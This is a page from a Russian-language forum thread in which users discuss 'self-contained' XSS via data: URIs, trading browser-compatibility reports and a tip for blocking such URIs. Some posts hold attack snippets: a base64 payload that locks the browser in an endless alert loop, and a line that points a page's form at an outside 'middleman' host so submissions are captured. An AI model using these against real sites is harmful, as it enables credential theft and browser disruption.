Поиск  Пользователи  Правила 
Закрыть
Логин:
Пароль:
Забыли свой пароль?
Войти
 
Страницы: Пред. 1 2 3 След.
RSS
Самодостаточные XSS атаки
 
В Опере такие уязвимости не прокатят, если пользователь не совсем дурак
 
Цитата
Следующие пример позволят открыть документ MS Word.
data:application/msword;base64,0M…
Мне удалось как максимум сохранить это на диск в фоксе с случайным(???) именем без .doc в конце.Открыть его случайно довольно трудно...
 
Кто не хочет блокировать скрипты добавьте в заблокированное содержимое
data:*;base64*
AJAX может работать не будет,
но ИМХО мало кто его юзает
 
Цитата
IE нынче огреб пару дыр класса remote code execution.На фоне этого вшивенький XSS - децкий лепет...
да лан - эта вшивенькая хсс может стоить много денег - гораздо больше, чем дырки в осле
с осла-то можно перейти на другие браузеры. и если чувак не сделал это и подхватил что-то - это чисто его проблемы. но куда уходить с ФФ или оперы? я могу с ходу назвать 2-3 браузера, но они меня не слишком радуют. тем более один из них это переделанный осел.
 
К слову о переходах на другой браузер. Мне седня опера предложила скачать новую версию 90.2 (девяносто точка два).

В этой версии вероятно, все мега секурно :)
 
незнаю, но в 9й опере не работает
 
Цитата
в общем, скрипт можно вставить на любом форуме и кто по ссылке кликнет то...
И как же его вставить? Форумы делают ссылку только если в начале стоит http://
Как же сформировать правельную ссылку, чтобы куки отправлял?
Тестил на phpBB и ФФ.
 
Кидди, с помощью этого ничего не добиться. Так что забейте на это.
 
Тут многим document.forms[0].action="http://middleman" будет достаточно.
 
Цитата
Гость пишет:
незнаю, но в 9й опере не работает
у меня Опера 9.02 и работает
 
Открываем вот это и прощаемся с IE или FF:
data:text/html;base64,PHNjcmlwdD4gd2hpbGUgKDEpIHthbGVydCgiU2VsZi1jb250YWluZWQgWFNT­Iik7fTsgPC9zY3JpcHQ+
 
Цитата
В догонку - сколько лет пройдет пока мозилла додумается для Local Computer Zone Hardening, как сделано у IE? А то безобразие...
Вероятно IE сначала делали для обозревания локального содержимого, а потом кто-то предложил использовать его в Инете. Зря...
 
а как вам такой расклад:

data:image/jpg;base64,Qk04AgAAAAAAADYAAAAoAAAAEAAAABAAAAABABAAAAAAAAAAAAASCwAAEgsA­AAAAAAAAAAAA/3//f/9//3/OOc45zjnOOc45zjnOOc45zjnOOc45zjn/f/9/­/3+6RnEtUSlRKVEpcS1RKXEtUSlxLXEtUSnOOf9//3//f7pG/3//f/9//3//­f/9//3//f/9//39QKc45/3+5DbkNuQ25DbkNfmt+a35rfmt+a35rfmv/f1Ap­zjm5DbkN/3//f/9/uQ25Df9//3//f/9//3//f/9/UCnOOf9//3//f/9//3+5­DbkNfmt+a35rfmt+a35r/39QKc45/3//f/9//3//f7kNuQ3/f/9//3//f/9/­/3//f3Etzjn/f7kNuQ25DbkNuQ1+a35rfmt+a35rfmt+a/9/kjHOObkNuQ3/­f/9//3//f/9//3//f/9//3//f/9//3+zNc45uQ25Df9//3//f35rfmt+a35r­fmt+a35rfmv/f7M1zjm5DbkN/3//f/9/uQ25Df9//3//f/9//3//f/9/1DnO­Of9/uQ25DbkNuQ25DX5jfmN+Y35jfmN+Y35j/38VPs45/3//f/9/ukb/f/9/­/3//f/9//3//f7M1szWzNRU+/3//f/9//3+6Rv9/fmN+Y35jfmN+Y35jFjo/­X3we/3//f/9//3//f7pG/3//f/9//3//f/9//38WOnky/3//f/9//3//f/9/­uka6RrpGuka6RrpGuka6RhY6/3//f/9//38AAA==
 
или даже так:

<html>
<img src="data:image/jpg;base64,Qk04AgAAAAAAADYAAAAoAAAAEAAAABAAAAABABAAAAAAAAAAAAASCwAAEgsA­AAAAAAAAAAAA/3//f/9//3/OOc45zjnOOc45zjnOOc45zjnOOc45zjn/f/9/­/3+6RnEtUSlRKVEpcS1RKXEtUSlxLXEtUSnOOf9//3//f7pG/3//f/9//3//­f/9//3//f/9//39QKc45/3+5DbkNuQ25DbkNfmt+a35rfmt+a35rfmv/f1Ap­zjm5DbkN/3//f/9/uQ25Df9//3//f/9//3//f/9/UCnOOf9//3//f/9//3+5­DbkNfmt+a35rfmt+a35r/39QKc45/3//f/9//3//f7kNuQ3/f/9//3//f/9/­/3//f3Etzjn/f7kNuQ25DbkNuQ1+a35rfmt+a35rfmt+a/9/kjHOObkNuQ3/­f/9//3//f/9//3//f/9//3//f/9//3+zNc45uQ25Df9//3//f35rfmt+a35r­fmt+a35rfmv/f7M1zjm5DbkN/3//f/9/uQ25Df9//3//f/9//3//f/9/1DnO­Of9/uQ25DbkNuQ25DX5jfmN+Y35jfmN+Y35j/38VPs45/3//f/9/ukb/f/9/­/3//f/9//3//f7M1szWzNRU+/3//f/9//3+6Rv9/fmN+Y35jfmN+Y35jFjo/­X3we/3//f/9//3//f7pG/3//f/9//3//f/9//38WOnky/3//f/9//3//f/9/­uka6RrpGuka6RrpGuka6RhY6/3//f/9//38AAA==">
</html>
 
about:cache?device=memory

много интерестного можно найти
 
А что мне нужно сделать чтобы создавался не ворд документ , а допустим рисунок , чтобы в нём было чего-то нарисовано  , что я хочу , или лучще - ехе-шник :)
 
Цитата
Гость пишет:
А что мне нужно сделать чтобы создавался не ворд документ , а допустим рисунок , чтобы в нём было чего-то нарисовано , что я хочу , или лучще - ехе-шник
Сомневаюсь что браузер запустит такое. Скорее предложит скачать и запустить
"Красота - как специи, которые хорошую еду делают ещё вкуснее, а без еды есть невозможно."
 
По идее никакого XSS в протоколе data: нету, т.к. это совершенно новый сайт и куки текущего сайта в него передаваться не должны. Если в фоксе это работает, то это проблемы только фокса, да и то лишь пока не пофиксят.
А внедрить срипт в src через data: тоже нифига не получится ИМХО.
 
Цитата
Открываем вот это и прощаемся с IE или FF:data:text/html;base64,PHNjcmlwdD4gd2hpbGUgKDEpIHthbGVydCgiU2VsZi1jb250YWluZWQgWFNT­Iik7fTsgPC9zY3JpcHQ+

А что у осла должно быть включено\настроено?
На 6 сказал, что не может отобразирть страницу.
 
В Internet Explorer данный вектор атаки не работает (т.к. данный браузер не поддерживает протокол data). Работает лишь в Mozilla, Firefox, Opera и возможно в других браузерах (в частности в браузерах на движке Мозилы). Поэтому данная уязвимость имеет ограниченое использование, потому что в IE не работает, который всё ещё наиболее распространён.

Но при этом уязвимость весьма опасная, в том числе в контексте XSS (включая возможность, хоть и усложнённую, захвата куки). При умелом использовании, возможны различного рода атаки. Ну и учитываем, что альтернативные браузеры становятся всё более популярными.

Вот к примеру разместил у себя на сайте Генератор XSS http: * .com.ua/xss_generator/ - для генерации самодостаточных XSS. Который упоминался в статье (разработанный автором сайта gnucitizen.org).
Страницы: Пред. 1 2 3 След.
Читают тему